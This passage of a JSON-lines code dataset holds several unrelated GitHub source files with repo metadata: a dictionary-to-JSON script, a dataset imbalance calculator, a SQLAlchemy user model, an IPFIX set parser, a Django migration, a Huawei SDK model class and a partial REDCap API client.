{}\n\n with open(\"dict.txt\") as f:\n for line in f:\n w, freq = line.strip().split()\n freq = int(freq)\n\n #key_sequence = ''.join([keymap[c] for c in w])\n key_seqs = ['']\n for c in w:\n if len(keymap[c]) > 1:\n tmp = []\n for km in keymap[c]:\n tmp += [ks+km for ks in key_seqs]\n key_seqs = tmp\n else:\n key_seqs = [ks+keymap[c] for ks in key_seqs]\n\n for key_sequence in key_seqs:\n if key_sequence not in keyseq:\n keyseq[key_sequence] = []\n keyseq[key_sequence].append((w, freq))\n\n for key in keyseq.keys():\n sorted(keyseq[key], key=lambda x: -x[1])\n\n with open(\"dict.json\", 'w') as f:\n json.dump(keyseq, f)\n\n\ndef avekeyToWords():\n with open(\"dict.json\") as f:\n keyseq = json.load(f)\n\n kwords = []\n for key, v in keyseq.items():\n kwords.append(len(v))\n kwords.sort(key = lambda x: -x)\n print (sum(kwords)/len(kwords))\n print (kwords[:50])\n\ndumpToJson()\navekeyToWords()\n\n'''\noriginal: 18, 15, 13 \nasd -> 12, 11, 11 \nyui -> 15, 13, 13 ()\nall -> 9, 9, 8 (avg: 1.08)\nqw, zx -> 15, 14, 14, 13\n'''\n","repo_name":"DrustZ/TenFingerTyping","sub_path":"webapp/src/Dict/dicttojson.py","file_name":"dicttojson.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"6118851925","text":"\"\"\"\n# Author: Yinghao Li\n# Modified: August 23rd, 2023\n# ---------------------------------------\n# Description: calculate the imbalance ratio of the datasets.\n\"\"\"\n\nimport sys\nimport logging\nimport os.path as op\nimport numpy as np\nfrom dataclasses import dataclass, field\nfrom muben.base.dataset import Dataset\nfrom muben.utils.io import set_logging\nfrom muben.utils.macro import CLASSIFICATION_DATASET\nfrom muben.utils.argparser import ArgumentParser\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Arguments:\n \"\"\"\n Arguments regarding the training of Neural hidden Markov Model\n \"\"\"\n\n # --- IO arguments ---\n dataset_folder: str = field(metadata={\"help\": \"The folder containing all datasets\"})\n\n\ndef main(args: Arguments):\n for dataset_name in CLASSIFICATION_DATASET:\n dataset_dir = op.join(args.dataset_folder, dataset_name)\n\n training_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"train\")\n valid_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"valid\")\n test_dataset = Dataset().read_csv(data_dir=dataset_dir, partition=\"test\")\n\n lbs = np.concatenate(\n (training_dataset.lbs, valid_dataset.lbs, test_dataset.lbs), axis=0\n )\n\n ratios = list()\n for lbs_ in lbs.T:\n n_pos = np.sum(lbs_ == 1)\n n_neg = np.sum(lbs_ == 0)\n pos_ratio = n_pos / (n_pos + n_neg)\n ratios.append(pos_ratio if pos_ratio > 0.5 else (1 - pos_ratio))\n\n logger.info(\n f\"{dataset_name}: Mean: {np.mean(ratios):.4f}; Max: {np.max(ratios):.4f}\"\n )\n\n\nif __name__ == \"__main__\":\n # --- set up arguments ---\n parser = ArgumentParser(Arguments)\n if len(sys.argv) == 2 and sys.argv[1].endswith(\".json\"):\n # If we pass only one argument to the script, and it's the path to a json file,\n # let's parse it to get our arguments.\n (arguments,) = parser.parse_json_file(json_file=op.abspath(sys.argv[1]))\n else:\n (arguments,) = parser.parse_args_into_dataclasses()\n\n set_logging()\n main(arguments)\n","repo_name":"Yinghao-Li/MUBen","sub_path":"assist/dataset_imbalance_ratio.py","file_name":"dataset_imbalance_ratio.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"20"} +{"seq_id":"71388163889","text":"from app.extensions.db import db\nfrom datetime import datetime\nfrom .reviews import Reviews\nfrom .funny_reviews import FunnyReviews\nfrom .helpful_reviews import HelpfulReviews\nfrom .games import Games\nfrom .playtime import Playtime\n\n\nDATE_FORMAT = \"%Y-%m-%d\"\n\nclass Users(db.Model):\n\n __tablename__ = 'users'\n id = db.Column(db.String(50), primary_key=True, unique=True)\n steam_id = db.Column(db.String(50), unique=True)\n reviews = db.relationship('Reviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n funny_reviews = db.relationship('FunnyReviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n helpful_reviews = db.relationship('HelpfulReviews', backref='user', lazy='dynamic', cascade=\"all, delete\")\n playtime = db.relationship('Playtime', backref='user', lazy='dynamic', cascade=\"all, delete\")\n\n def __repr__(self):\n\n return f'<{self.__tablename__} {self.id}>'\n \n @classmethod\n def add(cls, id:str, steam_id:str):\n \"\"\"Documentation here\n \"\"\"\n if (not cls.id_exists(id) and not cls.steam_id_exists(steam_id)):\n\n attr = cls(\n id=id,\n steam_id=steam_id\n )\n db.session.add(attr)\n db.session.commit()\n\n return attr\n \n @classmethod\n def get(cls, first=True, **fields):\n \n obj = cls.query.filter_by(**fields)\n\n if obj:\n\n if first:\n\n obj = obj.first()\n\n return obj\n \n else:\n\n raise ValueError(f\"record {fields} not exists into {cls.__tablename__}, please add it\")\n \n def add_review(self, review:str, recommend:bool, posted:str=datetime.now().date().strftime(DATE_FORMAT)):\n \"\"\"\n Documentation here\n \"\"\"\n\n return Reviews.add(\n review=review,\n recommend=recommend,\n posted=posted\n )\n \n @classmethod\n def id_exists(cls, id:int):\n r\"\"\"\n Documentation here\n \"\"\"\n attr = cls.get(id=id)\n\n if attr:\n \n return True\n \n return False\n \n @classmethod\n def steam_id_exists(cls, id:int):\n r\"\"\"\n Documentation here\n \"\"\"\n attr = cls.get(steam_id=id)\n\n if attr:\n \n return True\n \n return False\n \n def vote_for_funny_review(self, review:Reviews, funny:bool):\n \"\"\"Documentation here\n \"\"\"\n if review.user_id != self.id:\n\n if review not in self.funny_reviews:\n\n FunnyReviews.add(user_id=self.id, funny=funny, review_id=review.id)\n\n else:\n\n return None\n \n def vote_for_helpful_review(self, review:Reviews, helpful:bool):\n \"\"\"Documentation here\n \"\"\"\n if review.user_id != self.id:\n\n if review not in self.helpful_reviews:\n\n HelpfulReviews.add(user_id=self.id, helpful=helpful, review_id=review.id)\n\n else:\n\n return None\n \n def buy_game(self, game:Games):\n \"\"\"Documentation here\n \"\"\"\n if game not in self.games:\n\n self.games.append(game)\n \n def set_playtime(self, game:Games, playtime_forever:float, playtime_2weeks:float):\n \"\"\"Documentation here\n \"\"\"\n play_time = Playtime.add(\n game_id=game.id,\n user_id=self.id,\n playtime_forever=playtime_forever,\n playtime_2weeks=playtime_2weeks\n )\n db.session.add(play_time)\n db.session.commit()\n\n def serialize(self):\n \"\"\"Documentation here\n \"\"\"\n games = list()\n \n for game in self.games:\n \n playtime = Playtime.filter_by_user_and_game(user_id=self.id, game_id=game.id)\n if playtime is None:\n playtime = {\"playtime_forever\": 0, \"playtime_2weeks\": 0}\n else:\n playtime = playtime.serialize()\n \n result = game.serialize()\n result.update(playtime)\n games.append(result)\n \n return {\n \"id\": self.id,\n \"steam_id\": self.steam_id,\n \"games\": games,\n \"reviews\": [review.serialize() for review in self.reviews]\n }\n\n","repo_name":"know-ai/steam-rs","sub_path":"app/dbmodels/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23390895479","text":"# Reference: https://tools.ietf.org/html/rfc7011\n# Set Format:\n# +--------------------------------------------------+\n# | Set Header |\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# ...\n# +--------------------------------------------------+\n# | record |\n# +--------------------------------------------------+\n# | Padding (opt.) |\n# +--------------------------------------------------+\n#\n# Set Header Format:\n# 0 1 2 3\n# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n# | Set ID | Length |\n# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\nimport struct, logging, json\nfrom Lib.ParameterChecking import checkType, checkInteger\nfrom TemplateRecord import TemplateRecord\nfrom OptionTemplateRecord import OptionTemplateRecord\nfrom DataRecord import DataRecord\nfrom ObservationDomain import ObservationDomain\n\nclass Set(object):\n _str = struct.Struct('!HH')\n \n def __init__(self):\n self.setId = None\n self.setType = None\n self.length = None\n self.padLength = None\n self.records = []\n \n def __del__(self):\n for r in self.records: del r\n del self.setId\n del self.setType\n del self.length\n del self.padLength\n del self.records\n\n @classmethod\n def createTemplateSet(cls):\n obj = cls()\n obj.setId = 2\n obj.setType = 'template'\n return(obj)\n\n @classmethod\n def createOptionTemplateSet(cls):\n obj = cls()\n obj.setId = 3\n obj.setType = 'optionTemplate'\n return(obj)\n \n @classmethod\n def createDataSet(cls, domain, setId):\n checkType('domain', (ObservationDomain,), domain)\n checkInteger('setId', setId)\n if((setId == 0) or (setId == 1)): raise Exception('Unusable SetId(%d)' % setId)\n if(setId == 2): raise Exception('SetId(%d) can only be used in TemplateSets' % setId)\n if(setId == 3): raise Exception('SetId(%d) can only be used in OptionTemplateSets' % setId)\n if((setId >= 4) and (setId <= 255)): raise Exception('Reserved SetId(%d)' % setId)\n if(not domain.hasExporterTemplate(setId)):\n raise Exception('Domain(%d) does not contain Exporter Template(%d)' % (domain.obsDomainId, setId))\n obj = cls()\n obj.setId = setId\n obj.setType = 'data'\n return(obj)\n \n @classmethod\n def _readHeader(cls, rawData, obj):\n data = rawData.read(Set._str.size)\n (setId, length) = Set._str.unpack_from(data)\n \n if((setId == 0) or (setId == 1)):\n raise Exception('Unusable Set Type (%d)' % setId)\n elif((setId >= 4) and (setId <= 255)):\n raise Exception('Reserved Set Type (%d)' % setId)\n elif(setId == 2):\n obj.setId = setId\n obj.setType = 'template'\n obj.length = length\n elif(setId == 3):\n obj.setId = setId\n obj.setType = 'optionTemplate'\n obj.length = length\n else:\n obj.setId = setId\n obj.setType = 'data'\n obj.length = length\n\n @classmethod\n def read(cls, domain, rawData):\n logger = logging.getLogger(__name__)\n\n obj = cls()\n baseOffset = rawData.tell()\n cls._readHeader(rawData, obj)\n if(obj.setType == 'template'):\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n record = TemplateRecord.read(rawData)\n obj.records.append(record)\n elif(obj.setType == 'optionTemplate'):\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n OptionTemplateRecord.read(rawData)\n obj.records.append(record)\n else:\n if(not domain.hasCollectorTemplate(obj.setId)):\n logger.warning('Ignoring DataRecord since ObservationDomain(%d) does not contain Collector Template(%d)' % (domain.obsDomainId, obj.setId))\n cls._readPadding(rawData, obj, baseOffset)\n else:\n template = domain.getCollectorTemplate(obj.setId)\n while(obj.length - (rawData.tell() - baseOffset) > 4):\n record = DataRecord.read(template, rawData, domain)\n obj.records.append(record)\n cls._readPadding(rawData, obj, baseOffset)\n return(obj)\n \n @classmethod\n def _readPadding(cls, rawData, obj, baseOffset):\n paddingSize = obj.length - (rawData.tell() - baseOffset)\n rawData.read(paddingSize)\n \n def _computeLength(self):\n self.length = Set._str.size\n for record in self.records:\n self.length += record._computeLength()\n remLength = self.length % 4\n self.padLength = 0 if(remLength == 0) else (4 - remLength)\n self.length += self.padLength\n return(self.length)\n\n def _writeHeader(self, rawData):\n rawData.write(Set._str.pack(self.setId, self.length))\n\n def _writePadding(self, rawData):\n if(self.padLength > 0):\n rawData.write(struct.pack('x'*self.padLength))\n \n def write(self, rawData):\n self._writeHeader(rawData)\n for record in self.records:\n record.write(rawData)\n self._writePadding(rawData)\n \n def addRecord(self, record):\n if(self.setType == 'template'):\n checkType('record', (TemplateRecord,), record)\n elif(self.setType == 'optionTemplate'):\n checkType('record', (OptionTemplateRecord,), record)\n elif(self.setType == 'data'):\n checkType('record', (DataRecord,), record)\n else:\n raise Exception('Invalid Set Type(%s)' % str(self.setType))\n self.records.append(record)\n\n def getNumRecords(self): return(len(self.records))\n def getRecords(self): return(self.records)\n\n def getRecord(self, index):\n checkInteger('index', index)\n maxIndex = len(self.records)-1\n if(index < 0 or index > maxIndex):\n raise Exception('Out of range index(%d) must be between 0 and length-1(%d)' % (\n index, maxIndex))\n return(self.records[index])\n\n def toJSON(self):\n return({\n 'setId': self.setId,\n #'setType': self.setType,\n #'length': self.length,\n #'padLength': self.padLength,\n 'records': map(lambda s: s.toJSON(), self.records)\n })\n \n def __str__(self):\n return(json.dumps(self.toJSON()))\n","repo_name":"lgifre/pyIPFIX","sub_path":"Set.py","file_name":"Set.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41169508972","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app_TFT', '0007_auto_20150721_0803'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='teacher',\n name='role',\n field=models.CharField(default=b'l', max_length=1, choices=[(b'l', b'Lecturer'), (b'c', b'Coach')]),\n ),\n ]\n","repo_name":"jacgrady1/gitTFT","sub_path":"project_TFT/app_TFT/migrations/0008_auto_20150730_0448.py","file_name":"0008_auto_20150730_0448.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21858587909","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass KeyWordsStat:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'keyword': 'str',\n 'freq': 'int'\n }\n\n attribute_map = {\n 'keyword': 'keyword',\n 'freq': 'freq'\n }\n\n def __init__(self, keyword=None, freq=None):\n \"\"\"KeyWordsStat\n\n The model defined in huaweicloud sdk\n\n :param keyword: 关键词。\n :type keyword: str\n :param freq: 关键词频次。\n :type freq: int\n \"\"\"\n \n \n\n self._keyword = None\n self._freq = None\n self.discriminator = None\n\n self.keyword = keyword\n self.freq = freq\n\n @property\n def keyword(self):\n \"\"\"Gets the keyword of this KeyWordsStat.\n\n 关键词。\n\n :return: The keyword of this KeyWordsStat.\n :rtype: str\n \"\"\"\n return self._keyword\n\n @keyword.setter\n def keyword(self, keyword):\n \"\"\"Sets the keyword of this KeyWordsStat.\n\n 关键词。\n\n :param keyword: The keyword of this KeyWordsStat.\n :type keyword: str\n \"\"\"\n self._keyword = keyword\n\n @property\n def freq(self):\n \"\"\"Gets the freq of this KeyWordsStat.\n\n 关键词频次。\n\n :return: The freq of this KeyWordsStat.\n :rtype: int\n \"\"\"\n return self._freq\n\n @freq.setter\n def freq(self, freq):\n \"\"\"Sets the freq of this KeyWordsStat.\n\n 关键词频次。\n\n :param freq: The freq of this KeyWordsStat.\n :type freq: int\n \"\"\"\n self._freq = freq\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, KeyWordsStat):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"huaweicloud/huaweicloud-sdk-python-v3","sub_path":"huaweicloud-sdk-cbs/huaweicloudsdkcbs/v1/model/key_words_stat.py","file_name":"key_words_stat.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"20"} +{"seq_id":"16326549194","text":"import json\nimport re\nfrom collections import defaultdict\nfrom urllib.parse import unquote\n\nfrom d3b_utils.requests_retry import Session\n\n\ndef _undefault_dict(d):\n if isinstance(d, dict):\n d = {k: _undefault_dict(v) for k, v in d.items()}\n if isinstance(d, set):\n return sorted(d)\n return d\n\n\nclass REDCapError(Exception):\n pass\n\n\n# Note to future developers: This class uses get_ and set_ methods on purpose\n# to control the user experience. Please don't replace them with property\n# decorators. It needs to be completely unambiguous without inspecting the\n# implementation that the data is somewhere else and that setting anything\n# has serious consequences. This is an interface for manipulating REDCap with\n# project administrative privilege, not just some data container.\n# - Avi\nclass REDCapStudy:\n def __init__(self, api_url, api_token):\n self.api = api_url\n self.api_token = api_token\n\n def _get_response(self, content, params=None, **kwargs):\n \"\"\"API request implementation\n\n :param content: What kind of content we're requesting to get or set\n :param params: additional parameters to send\n :raises REDCapError: REDCap returned an error status\n :return: REDCap server requests.Response object\n \"\"\"\n all_params = {\n \"token\": self.api_token,\n \"content\": content,\n \"format\": \"json\",\n \"returnFormat\": \"json\",\n }\n all_params.update(params or {})\n if \"data\" in all_params and not isinstance(all_params[\"data\"], str):\n all_params[\"data\"] = json.dumps(all_params[\"data\"])\n all_params = {k: v for k, v in all_params.items() if v is not None}\n resp = Session(status_forcelist=(502, 503, 504)).post(\n self.api, data=all_params, **kwargs\n )\n if resp.status_code != 200:\n raise REDCapError(f\"HTTP {resp.status_code} - {resp.text}\")\n return resp\n\n def _get_json(self, *args, **kwargs):\n return self._get_response(*args, **kwargs).json()\n\n def _get_text(self, *args, **kwargs):\n return self._get_response(*args, **kwargs).text\n\n def get_arm_names(self):\n \"\"\"Export Arm names\n\n :return: list of dicts with Arm numbers and names\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_arms\n return self._get_json(\"arm\")\n\n def set_arm_names(self, arms, delete_all_first=True):\n \"\"\"Import Arm names or rename existing Arms\n\n :param delete_all_first: erase all existing Arms first before importing\n :return: number of Arms imported\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_arms\n return self._get_json(\n \"arm\",\n params={\n \"data\": arms,\n \"override\": \"1\" if delete_all_first else \"0\",\n \"action\": \"import\",\n },\n )\n\n def get_event_metadata(self):\n \"\"\"Export Event details (names, numbers, labels, offsets)\n\n :return: list of dicts with Event details\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_metadata\n return self._get_json(\"event\")\n\n def set_event_metadata(self, events, delete_all_first=True):\n \"\"\"Import Event details (names, numbers, labels, offsets)\n\n :param events: see get_event_metadata return\n :param delete_all_first: erase all existing Events first before importing\n :return: number of Events imported\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_metadata\n return self._get_json(\n \"event\",\n params={\n \"action\": \"import\",\n \"override\": \"1\" if delete_all_first else \"0\",\n },\n )\n\n def get_instrument_labels(self):\n \"\"\"Export mappings of instrument internal names to their display labels\n\n :return: list of dicts with instrument_name and instrument_label keys\n \"\"\"\n return self._get_json(\"instrument\")\n\n def get_field_export_names(self):\n \"\"\"Export mappings of field names and selected values to exported names\n\n :return: list of dicts of field choices\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_field_names\n return self._get_json(\"exportFieldNames\")\n\n def _act_file(\n self,\n action,\n record,\n field,\n event=None,\n repeat_instance=None,\n file_data=None,\n ):\n params = {\n \"action\": action,\n \"record\": record,\n \"field\": field,\n \"event\": event,\n \"repeat_instance\": repeat_instance,\n }\n return self._get_response(\"file\", params, files=file_data)\n\n def get_file(self, record, field, event=None, repeat_instance=None):\n \"\"\"Export a File from a file upload field on a record\n\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n :return: dict with \"filename\" str and \"body\" bytes\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_file\n resp = self._act_file(\"export\", record, field, event, repeat_instance)\n file_name = (\n unquote(\n resp.headers[\"Content-Type\"].split('name=\"')[1].split('\";')[0]\n )\n .encode(\"latin1\")\n .decode(\"utf-8\")\n )\n return {\"body\": resp.content, \"filename\": file_name}\n\n def set_file(\n self,\n filename,\n file_obj,\n record,\n field,\n event=None,\n repeat_instance=None,\n ):\n \"\"\"Attach a File to a file upload field on a record\n\n :param filename: name of the file to create\n :param file_obj: contents of or read object for the file\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_file\n self._act_file(\n \"import\",\n record,\n field,\n event,\n repeat_instance,\n {\"file\": (filename, file_obj)},\n )\n\n def delete_file(self, record, field, event=None, repeat_instance=None):\n \"\"\"Delete a File from a file upload field on a record\n\n :param record: the record ID the file is attached to\n :param field: the name of field with the file\n :param event: event name if longitudinal\n :param repeat_instance: which instance if instrument/event is repeating\n \"\"\"\n # https://redcap.chop.edu/api/help/?content=del_file\n self._act_file(\n action=\"delete\",\n record=record,\n field=field,\n event=event,\n repeat_instance=repeat_instance,\n )\n\n def get_redcap_version(self):\n \"\"\"Get the version of REDCap as a string\"\"\"\n # https://redcap.chop.edu/api/help/?content=exp_rc_v\n return self._get_text(\"version\")\n\n def get_project_info(self):\n \"\"\"Get basic project attributes such as title, logitudinality,\n if surveys are enabled, creation time, etc.\"\"\"\n return self._get_json(\"project\")\n\n def set_project_info(self, project_info):\n \"\"\"Set basic project attributes such as title, logitudinality,\n if surveys are enabled, creation time, etc.\"\"\"\n # https://redcap.chop.edu/api/help/?content=imp_proj_sett\n return self._get_json(\"project_settings\", params={\"data\": project_info})\n\n def get_project_xml(\n self,\n metadata_only=True,\n include_data_access_groups=True,\n include_survey_fields=True,\n include_files=True,\n ):\n \"\"\"Fetch the entire project as a special XML file in CDISC ODM format.\n\n :param metadata_only: Don't include any of the record data\n :param include_data_access_groups: Include the redcap_data_access_group\n field in data (does nothing if metadata_only is True)\n :param include_survey_fields: Include survey identifier fields in data\n (does nothing if metadata_only is True)\n :param include_files: Include file_upload and signature fields in data\n (does nothing if metadata_only is True)\n\n :return: string contents of an XML file\n \"\"\"\n return self._get_text(\n \"project_xml\",\n {\n \"returnMetadataOnly\": metadata_only,\n \"exportDataAccessGroups\": include_data_access_groups,\n \"exportSurveyFields\": include_survey_fields,\n \"exportFiles\": include_files,\n },\n )\n\n def get_users(self):\n \"\"\"List user information with privileges, email address, and names\"\"\"\n return self._get_json(\"user\")\n\n def set_users(self, users):\n \"\"\"Set or update user privileges, email address, and names\n\n :param users: see output of get_users\n :return: number of users added or updated\n \"\"\"\n return self._get_json(\"user\", {\"data\": users})\n\n def get_data_dictionary(self):\n \"\"\"Get the instrument definition information.\"\"\"\n return self._get_json(\"metadata\")\n\n def set_data_dictionary(self, data_dictionary):\n \"\"\"Set the instrument definitions.\n\n :param data_dictionary: see output of get_data_dictionary\n :return: number of fields imported\n \"\"\"\n return self._get_json(\"metadata\", {\"data\": data_dictionary})\n\n def get_instrument_event_mappings(self):\n return self._get_json(\"formEventMapping\")\n\n def set_instrument_event_mappings(self, iem):\n return self._get_json(\"formEventMapping\", {\"data\": iem})\n\n def create_project(self, project_data):\n raise NotImplementedError() # TODO\n\n def get_instrument_tree(self):\n \"\"\"\n Get a tree of instrument metadata that looks like:\n {\n : {\n \"events\": {, , ...},\n \"fields\": {\n : <{field_info_dict}>,\n ...\n },\n ...\n }\n \"\"\"\n store = defaultdict( # forms\n lambda: defaultdict(dict) # events and fields\n )\n for m in self.get_data_dictionary():\n instrument = m.pop(\"form_name\")\n field_name = m.pop(\"field_name\")\n store[instrument][\"fields\"][field_name] = m\n store[instrument][\"events\"] = set()\n\n for form in self.get_instrument_event_mappings():\n store[form[\"form\"]][\"events\"].add(form[\"unique_event_name\"])\n\n return _undefault_dict(store)\n\n def _records_getter(\n self,\n content,\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n params=None,\n ):\n args = {\n \"rawOrLabel\": \"raw\" if raw else \"label\",\n \"rawOrLabelHeaders\": \"raw\" if raw_headers else \"label\",\n \"exportCheckboxLabel\": \"true\" if checkbox_labels else \"false\",\n }\n args.update(params or {})\n return self._get_json(content, params=args)\n\n def get_subjects(self):\n \"\"\"Get the list of record subject IDs\"\"\"\n id_field = self.get_data_dictionary()[0][\"field_name\"]\n id_records = self._records_getter(\"record\", params={\"fields\": id_field})\n return list({e[id_field] for e in id_records})\n\n def get_records(\n self,\n type=\"eav\",\n raw=True,\n raw_headers=True,\n checkbox_labels=False,\n survey_fields=True,\n data_access_groups=True,\n fields=None,\n ):\n \"\"\"Returns all data from the study without restructuring\"\"\"\n remaining_subjects = self.get_subjects()\n batch_size = len(remaining_subjects)\n print(f\"Found {batch_size} subjects.\")\n records = []\n while remaining_subjects:\n batch = remaining_subjects[:batch_size]\n print(f\"Requesting {len(batch)} subjects...\")\n params = {\n \"type\": type,\n \"exportSurveyFields\": \"true\" if survey_fields else \"false\",\n \"exportDataAccessGroups\": \"true\"\n if data_access_groups\n else \"false\",\n }\n for i, r in enumerate(batch):\n params[f\"records[{i}]\"] = r\n\n if fields:\n for i, f in enumerate(fields):\n params[f\"fields[{i}]\"] = f\n\n try:\n records.extend(\n self._records_getter(\n \"record\",\n raw=raw,\n raw_headers=raw_headers,\n checkbox_labels=checkbox_labels,\n params=params,\n )\n )\n remaining_subjects = remaining_subjects[batch_size:]\n except REDCapError as e:\n if str(e).startswith((\"HTTP 400\", \"HTTP 500\")):\n print(\"Reducing batch size and trying again...\")\n batch_size = int(0.5 + (batch_size / 2))\n else:\n print(str(e))\n return\n\n if type == \"eav\":\n id_field = self.get_data_dictionary()[0][\"field_name\"]\n records = [r for r in records if r[\"field_name\"] != id_field]\n return records\n\n def set_records(\n self, records, type=\"eav\", overwrite=False, auto_number=False\n ):\n args = {\n \"type\": type,\n \"data\": records,\n \"overwriteBehavior\": \"overwrite\" if overwrite else \"normal\",\n \"forceAutoNumber\": \"true\" if auto_number else \"false\",\n }\n if auto_number:\n args[\"returnContent\"] = \"auto_ids\"\n return self._get_json(\"record\", params=args)\n\n def delete_records(self, record_name_list, arm=None):\n args = {\"action\": \"delete\"}\n for i, r in enumerate(record_name_list):\n args[f\"records[{i}]\"] = r\n if arm is not None:\n args[\"arm\"] = arm\n return self._get_json(\"record\", args)\n\n def get_repeating_forms_events(self):\n self._get_json(\"repeatingFormsEvents\")\n\n def set_repeating_forms_events(self, rfe):\n self._get_json(\"repeatingFormsEvents\", params={\"data\": rfe})\n\n def get_report_records(\n self, report_id, raw=True, raw_headers=True, checkbox_labels=False\n ):\n return self._records_getter(\n \"report\",\n raw=raw,\n raw_headers=raw_headers,\n checkbox_labels=checkbox_labels,\n params={\"report_id\": report_id},\n )\n\n def get_selector_choice_map(self):\n \"\"\"Returns a map for every field that needs translation from index to\n value:\n {\n : {\n : ,\n ...\n },\n ...\n }\n \"\"\"\n store = dict()\n forms = set()\n for m in self.get_data_dictionary():\n forms.add(m[\"form_name\"])\n if m[\"field_type\"] in {\"dropdown\", \"radio\", \"checkbox\"}:\n store[m[\"field_name\"]] = {\n k.strip(): v.strip()\n for k, v in map(\n lambda x: x.split(\",\", 1),\n m[\"select_choices_or_calculations\"].split(\"|\"),\n )\n }\n elif m[\"field_type\"] == \"yesno\":\n store[m[\"field_name\"]] = {\"1\": \"Yes\", \"0\": \"No\"}\n elif m[\"field_type\"] == \"truefalse\":\n store[m[\"field_name\"]] = {\"1\": \"True\", \"0\": \"False\"}\n\n for f in forms:\n store[f + \"_complete\"] = {\n \"2\": \"Complete\",\n \"1\": \"Unverified\",\n \"0\": \"Incomplete\",\n }\n return store\n\n def get_records_tree(self, debug_type=\"flat\", raw_selectors=False):\n \"\"\"Returns all data from the study in the nested form:\n {\n : { # event data\n : { # instrument data\n : { # subject data for this event+instrument\n : { # subject event+instrument instance\n : set(), # field values\n ...\n },\n ...\n },\n ...\n },\n ...\n },\n ...\n }\n \"\"\"\n # this is where we'll store all the data\n store = defaultdict( # events\n lambda: defaultdict( # instruments\n lambda: defaultdict( # subjects\n lambda: defaultdict( # instances\n lambda: defaultdict(set) # field names # values\n )\n )\n )\n )\n\n data_dict = self.get_data_dictionary()\n record_id_field = data_dict[0][\"field_name\"]\n field_forms = {m[\"field_name\"]: m[\"form_name\"] for m in data_dict}\n # \"_complete\" fields are not considered part of the\n # instruments, so include them specially\n for inst in set(field_forms.values()):\n field_forms[f\"{inst}_complete\"] = inst\n\n event_forms = defaultdict(set)\n for iem in self.get_instrument_event_mappings():\n event_forms[iem[\"unique_event_name\"]].add(iem[\"form\"])\n\n selector_map = self.get_selector_choice_map()\n\n # We could retrieve labels instead of raw, but two different\n # instruments could be given the same name which are meant to be\n # interpreted based on context. That may mean that we couldn't\n # differentiate between the two, so we should defer translating headers\n # until the very end.\n #\n # Unfortunately there's no way to independently ask for translated\n # selector values (e.g. \"Female\" instead of \"1\") without also asking\n # for translated headers, so asking for raw means doing a lot more work\n # selectively digging through project metadata to map the selectors.\n # This is made more difficult by the fact that the REDCap project\n 